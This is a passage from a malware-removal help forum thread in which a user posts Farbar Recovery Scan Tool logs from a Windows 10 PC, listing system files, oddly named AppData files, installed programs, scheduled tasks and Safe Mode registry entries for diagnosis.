2016-08-26 22:30 - 2015-07-10 07:04 - 00000076 _____ C:\Windows\win.ini
2016-08-26 22:30 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files\Common Files\System
2016-08-26 20:45 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\AppReadiness
2016-08-25 20:29 - 2015-07-10 05:05 - 00032768 ___SH C:\Windows\system32\config\ELAM
2016-08-25 20:16 - 2015-07-10 07:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-08-24 12:57 - 2015-07-16 12:39 - 00875126 _____ C:\Windows\system32\PerfStringBackup.INI
2016-08-24 12:57 - 2015-07-10 07:02 - 00000000 ____D C:\Windows\INF
2016-08-22 17:58 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\rescache
2016-08-20 12:51 - 2015-07-10 07:04 - 00000000 ___SD C:\Windows\Downloaded Program Files
2016-08-20 12:45 - 2015-07-10 06:55 - 00000000 ____D C:\Windows\CbsTemp
2016-08-19 17:03 - 2015-07-10 07:04 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-08-19 13:03 - 2015-07-16 12:41 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-08-19 06:46 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\system32\SecureBootUpdates
2016-08-19 06:33 - 2015-07-10 07:04 - 00000000 ___SD C:\Windows\SysWOW64\F12
2016-08-19 06:33 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\SysWOW64\oobe
2016-08-19 06:33 - 2015-07-10 05:05 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-08-19 06:32 - 2015-07-10 07:04 - 00000000 ___SD C:\Windows\system32\F12
2016-08-19 06:32 - 2015-07-10 07:04 - 00000000 ___SD C:\Windows\system32\DiagSvcs
2016-08-19 06:32 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-08-19 06:32 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-08-19 06:32 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\system32\oobe
2016-08-19 06:32 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\system32\appraiser
2016-08-19 06:32 - 2015-07-10 05:05 - 00000000 ____D C:\Windows\system32\Dism
2016-08-19 06:31 - 2015-07-10 09:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ___RD C:\Windows\DevicesFlow
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\Provisioning
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\L2Schemas
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files\Windows Defender
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-08-19 06:31 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2016-08-03 02:45 - 2015-07-16 12:35 - 02718208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2016-07-28 18:45 - 2015-07-10 07:04 - 00028672 _____ C:\Windows\system32\config\BCD-Template
2016-07-28 17:52 - 2015-07-16 13:30 - 00000000 ____D C:\Windows\Panther
2016-07-28 15:17 - 2015-07-10 07:04 - 00000000 ____D C:\Windows\Help
 
==================== Files in the root of some directories =======
 
2016-06-17 02:54 - 2016-06-17 02:54 - 0001129 _____ () C:\Users\Ryan\AppData\Roaming\24.svg
2016-06-17 02:54 - 2016-06-17 02:54 - 0004206 _____ () C:\Users\Ryan\AppData\Roaming\additional_tools_get_help_icon.png
2016-06-17 02:54 - 2016-06-17 02:54 - 0000369 _____ () C:\Users\Ryan\AppData\Roaming\amd.js
2016-06-17 02:53 - 2016-06-17 02:53 - 0000528 _____ () C:\Users\Ryan\AppData\Roaming\cd.png
2016-06-17 02:53 - 2016-06-17 02:53 - 0001744 _____ () C:\Users\Ryan\AppData\Roaming\current.docid.xml
2014-11-29 10:40 - 2014-11-29 10:40 - 0029926 _____ () C:\Users\Ryan\AppData\Roaming\drijnall.gsf
2016-08-19 18:03 - 2016-08-19 18:03 - 0000250 _____ () C:\Users\Ryan\AppData\Roaming\ecbolic.xnm
2014-11-29 10:40 - 2014-11-29 10:40 - 0000766 _____ () C:\Users\Ryan\AppData\Roaming\fod.cv
2014-05-19 09:24 - 2014-05-19 09:24 - 0016958 _____ () C:\Users\Ryan\AppData\Roaming\gcixonr.kmi
2016-08-19 21:58 - 2016-08-20 16:36 - 0003998 _____ () C:\Users\Ryan\AppData\Roaming\HandfulTupik.BVV
1985-05-14 03:00 - 1985-05-14 03:00 - 0049853 _____ () C:\Users\Ryan\AppData\Roaming\Horologium.n
2014-11-29 10:40 - 2014-11-29 10:40 - 0002862 _____ () C:\Users\Ryan\AppData\Roaming\jun.cbfs
2016-08-19 18:03 - 2016-08-19 18:03 - 0003748 _____ () C:\Users\Ryan\AppData\Roaming\juncture.txn
2016-08-21 17:19 - 2016-08-21 17:19 - 0049672 _____ () C:\Users\Ryan\AppData\Roaming\opoweeai.drh
2016-08-21 17:19 - 2016-08-21 17:19 - 0009994 _____ () C:\Users\Ryan\AppData\Roaming\rowgleru
2014-11-29 10:40 - 2014-11-29 10:40 - 0000326 _____ () C:\Users\Ryan\AppData\Roaming\uesdiww.ikdu
2014-11-29 10:40 - 2014-11-29 10:40 - 0007886 _____ () C:\Users\Ryan\AppData\Roaming\yvpc.yf
2016-08-19 22:14 - 2016-08-19 22:14 - 0000480 ____H () C:\Users\Ryan\AppData\Roaming\½Ó
2014-11-29 10:40 - 2014-11-29 10:40 - 0001078 _____ () C:\Users\Ryan\AppData\Local\dpkng.kw
2014-11-08 00:42 - 2014-11-08 00:42 - 0029926 _____ () C:\Users\Ryan\AppData\Local\eq.sgfp
2016-08-23 13:02 - 2016-08-23 13:02 - 0049672 _____ () C:\Users\Ryan\AppData\Local\fbbwudfn.jy
2016-08-23 13:02 - 2016-08-23 13:02 - 0012228 _____ () C:\Users\Ryan\AppData\Local\gchbgoka
2014-11-29 10:40 - 2014-11-29 10:40 - 0009062 _____ () C:\Users\Ryan\AppData\Local\udjc.uk
2016-08-19 22:15 - 2016-08-19 22:15 - 0000008 ____H () C:\ProgramData\@000001.dat
2016-08-19 22:15 - 2016-08-27 04:08 - 0000920 ____H () C:\ProgramData\@system.temp
2016-08-19 22:14 - 2016-08-27 04:08 - 0000656 ____H () C:\ProgramData\@system3.att
2016-08-20 12:50 - 2016-08-20 12:50 - 0000133 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc
 
Files to move or delete:
====================
C:\ProgramData\@000001.dat
 
 
Some files in TEMP:
====================
C:\Users\Ryan\AppData\Local\Temp\AcDeltree.exe
C:\Users\Ryan\AppData\Local\Temp\libeay32.dll
C:\Users\Ryan\AppData\Local\Temp\McCSPInstall.dll
C:\Users\Ryan\AppData\Local\Temp\msvcr120.dll
C:\Users\Ryan\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-08-19 13:43
 
==================== End of FRST.txt ============================

  • 0

Advertisements


#17
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-08-2016 01
Ran by Ryan (27-08-2016 04:12:50)
Running from C:\Users\Ryan\Downloads
Windows 10 Home (X64) (2016-07-28 21:52:14)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-868973554-806322924-1075547668-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-868973554-806322924-1075547668-503 - Limited - Disabled)
Guest (S-1-5-21-868973554-806322924-1075547668-501 - Limited - Disabled)
Ryan (S-1-5-21-868973554-806322924-1075547668-1002 - Administrator - Enabled) => C:\Users\Ryan
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ACA & MEP 2016 Object Enabler (Version: 7.8.41.0 - Autodesk) Hidden
ACAD Private (Version: 20.1.49.0 - Autodesk) Hidden
Akamai NetSession Interface (HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Akamai) (Version:  - Akamai Technologies, Inc)
Apple Application Support (32-bit) (HKLM-x32\...\{D4B07658-F443-4445-A261-E643996E139D}) (Version: 4.3.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{A6B0442B-E159-444B-B49D-6B9AC531EAE3}) (Version: 4.3.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AutoCAD 2016 - English (Version: 20.1.49.0 - Autodesk) Hidden
AutoCAD 2016 (Version: 20.1.107.0 - Autodesk) Hidden
AutoCAD 2016 Language Pack - English (Version: 20.1.49.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2016 (HKLM-x32\...\{94AD53E7-493B-4291-8714-7A3B761D2783}) (Version: 6.3.0.15 - Autodesk)
Autodesk App Manager 2016 (HKLM-x32\...\{4ECF9E00-2978-46AF-BD80-455EFEAB7A93}) (Version: 2.0.0 - Autodesk)
Autodesk AutoCAD 2016 - English (HKLM\...\AutoCAD 2016 - English) (Version: 20.1.49.0 - Autodesk)
Autodesk AutoCAD 2016 SP 1 (HKLM\...\AutoCAD 2016 SP1) (Version: 20.1.107.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.4 (HKLM-x32\...\{4E20873D-BC20-495C-AFD9-B18877B7F9BB}) (Version: 1.2.4.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2016 Add-in 64 bit (HKLM\...\{4BEE127E-95C4-434D-ABAC-65155192BB24}) (Version: 4.35.1742 - Autodesk)
Autodesk Content Service (HKLM\...\Autodesk Content Service) (Version: 3.2.0.0 - Autodesk)
Autodesk Content Service (Version: 3.2.0.0 - Autodesk) Hidden
Autodesk Content Service Language Pack (Version: 3.2.0.0 - Autodesk) Hidden
Autodesk Download Manager (HKLM-x32\...\{EC92633C-8F08-470A-BCDF-3FE5FD778C8D}) (Version: 4.0.14.0 - Autodesk, Inc.)
Autodesk Featured Apps 2016 (HKLM-x32\...\{D42F37CD-9AF9-4435-A474-B387C5BB6B47}) (Version: 2.0.0 - Autodesk)
Autodesk Material Library 2016 (HKLM-x32\...\{29A7D6EC-63C2-42FD-8143-5812ABD2923F}) (Version: 6.3.0.15 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2016 (HKLM-x32\...\{6B4CFC6E-ECB0-47FE-95D3-65C680ED0687}) (Version: 6.3.0.15 - Autodesk)
Autodesk ReCap 2016 (HKLM\...\Autodesk ReCap 2016) (Version: 1.5.0.33 - Autodesk)
Autodesk ReCap 2016 (Version: 1.5.0.33 - Autodesk) Hidden
Autodesk Revit 2016 (HKLM\...\Autodesk Revit 2016) (Version: 16.0.428.0 - Autodesk)
Autodesk Revit Content Libraries 2016 (HKLM\...\Autodesk Revit Content Libraries 2016) (Version: 16.0.428.0 - Autodesk)
Autodesk Workflows 2016 (HKLM\...\{535CDED0-D690-4738-83EE-09056A365BAC}) (Version: 6.3.0.18 - Autodesk, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
FARO LS 1.1.501.0 (64bit) (HKLM-x32\...\{8A470330-70B2-49AD-86AF-79885EF9898A}) (Version: 5.1.0.30630 - FARO Scanner Production)
FARO LS 1.1.502.0 (64bit) (HKLM-x32\...\{66D83FE0-D798-4B38-86FE-FB48151E5AEF}) (Version: 5.2.0.35213 - FARO Scanner Production)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 52.0.2743.116 - Google Inc.)
Google Drive (HKLM-x32\...\{459CE109-4E46-4340-92BC-054642BC3BC2}) (Version: 1.31.2873.2758 - Google, Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.21.115 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
iTunes (HKLM\...\{955524E7-79EB-4CA9-BA4D-FD2DF587651B}) (Version: 12.4.3.1 - Apple Inc.)
McAfee AntiVirus Plus (HKLM-x32\...\MSC) (Version: 15.0.166 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.262 - McAfee, Inc.)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSI Kombustor 2.5.9 (HKLM-x32\...\{0B7C79A5-5CB2-4ABD-A9C1-92A6213CE8DD}_is1) (Version:  - MSI Co., LTD)
MSI Live Update 6 (HKLM-x32\...\{4F46CF54-47D2-41F4-B230-B0954C544420}}_is1) (Version: 6.1.021 - MSI)
NVIDIA 3D Vision Controller Driver 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 355.82 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.14.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.14.5 - NVIDIA Corporation)
NVIDIA Graphics Driver 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 355.82 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Revit 2016 (Version: 16.0.428.0 - Autodesk) Hidden
Revit Content Libraries 2016 (Version: 16.0.428.0 - Autodesk) Hidden
SHIELD Streaming (Version: 4.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.14.5 - NVIDIA Corporation) Hidden
SketchUp Import 2016 (HKLM-x32\...\{C769FB7C-1F55-4B31-9A2A-21CEC50F4F92}) (Version: 2.0.0 - Autodesk)
Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{6DA2B636-698A-3294-BF4A-B5E11B238CDD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{8CCEA24C-51AE-3B71-9092-7D0C44DDA2DF}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{C3A57BB3-9AA6-3F6F-9395-6C062BDD5FC4}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
Visual C++ 2008 - x64 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{F6F09DD8-F39B-3A16-ADB9-C9E6B56903F9}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{04B34E21-5BEE-3D2B-8D3D-E3E80D253F64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{14866AAD-1F23-39AC-A62B-7091ED1ADE64}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{4B90093A-5D9C-3956-8ABB-95848BE6EFAD}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
Visual C++ 2008 - x86 (KB958357) - v9.0.30729.177 (HKLM-x32\...\{B42E259C-E4D4-37F1-A1B2-EB9C4FC5A04D}.KB958357) (Version: 9.0.30729.177 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-868973554-806322924-1075547668-1002_Classes\CLSID\{0B628DE4-07AD-4284-81CA-5B439F67C5E6}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-868973554-806322924-1075547668-1002_Classes\CLSID\{149DD748-EA85-45A6-93C5-AC50D0260C98}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-868973554-806322924-1075547668-1002_Classes\CLSID\{5370C727-1451-4700-A960-77630950AF6D}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-868973554-806322924-1075547668-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Ryan\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-868973554-806322924-1075547668-1002_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2016\en-US\acadficn.dll (Autodesk, Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {3707D9FF-DA88-48E0-8AC4-A25F97A7A5D8} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-01-27] (McAfee, Inc.)
Task: {3F6E048D-6404-433B-8F5F-CFF4D89BF89E} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Rundll32.exe generaltel.dll,RunTelemetryW
Task: {4C302DE3-01FD-4A1A-90F7-7AB4BA9AFEBF} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-01-27] (McAfee, Inc.)
Task: {583D40CB-4B24-47C4-878A-479E5D88D45B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2016-07-07] (McAfee, Inc.)
Task: {644956A6-CF7B-4C8D-A37E-FFF74FB73656} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-17] (Google Inc.)
Task: {681EB85C-FF5A-4F32-B8AA-E7FE2D3E0DD1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-17] (Google Inc.)
Task: {6EB3E0FA-60E4-42E3-8D26-60623584C282} - System32\Tasks\Microsoft Office 15 Sync Maintenance for DESKTOP-A6RCKOD-Ryan DESKTOP-A6RCKOD => C:\Program Files\Microsoft Office\Office15\MsoSync.exe
Task: {99CB7F4C-AC93-4010-8C11-685106391E0F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {AE7FF614-B27D-4F45-8E7F-B70AD6713C90} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {B06CB1C1-BC5B-4A2F-9AA6-20BA78EB2E76} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {CF9D793A-6D6D-4F54-8122-97166BBDC811} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Ryan\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-22] (Microsoft Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Ryan\AppData\Local\751c12\230b29.lnk -> C:\Users\Ryan\AppData\Local\751c12\ed6901.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-08-18 23:20 - 2015-07-14 22:04 - 00032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2016-07-28 15:17 - 2015-08-25 11:57 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-07-05 15:23 - 2016-07-05 15:23 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-07-05 15:23 - 2016-07-05 15:23 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-08-18 23:19 - 2015-08-11 05:14 - 00404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2016-08-18 23:19 - 2016-08-03 01:44 - 02495776 _____ () C:\Windows\system32\CoreUIComponents.dll
2016-08-18 23:19 - 2016-08-03 01:44 - 02495776 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-08-22 20:46 - 2016-08-22 20:46 - 01864384 _____ () C:\Users\Ryan\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-08-18 23:17 - 2015-09-17 01:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 06:59 - 2015-07-10 06:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2016-08-17 23:15 - 2016-08-02 19:41 - 02366280 _____ () C:\Program Files (x86)\Google\Chrome\Application\52.0.2743.116\libglesv2.dll
2016-08-17 23:15 - 2016-08-02 19:40 - 00107848 _____ () C:\Program Files (x86)\Google\Chrome\Application\52.0.2743.116\libegl.dll
2016-08-18 23:20 - 2016-08-03 00:34 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-08-18 23:20 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-08-18 23:20 - 2016-08-03 00:31 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-08-18 23:20 - 2015-09-17 01:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-08-20 16:37 - 2005-07-18 13:43 - 00160256 _____ () C:\Program Files (x86)\MSI\Live Update\unrar.dll
2016-07-28 15:18 - 2015-08-26 20:37 - 00011896 ____R () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-08-22 20:46 - 2016-08-22 20:46 - 01383616 _____ () C:\Users\Ryan\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll
2016-08-22 20:46 - 2016-08-22 20:46 - 00118976 _____ () C:\Users\Ryan\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileSyncViews.dll
2016-08-23 22:20 - 2016-08-23 22:20 - 00075264 _____ () C:\Users\Ryan\AppData\Local\AXworks\AtlInterval.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
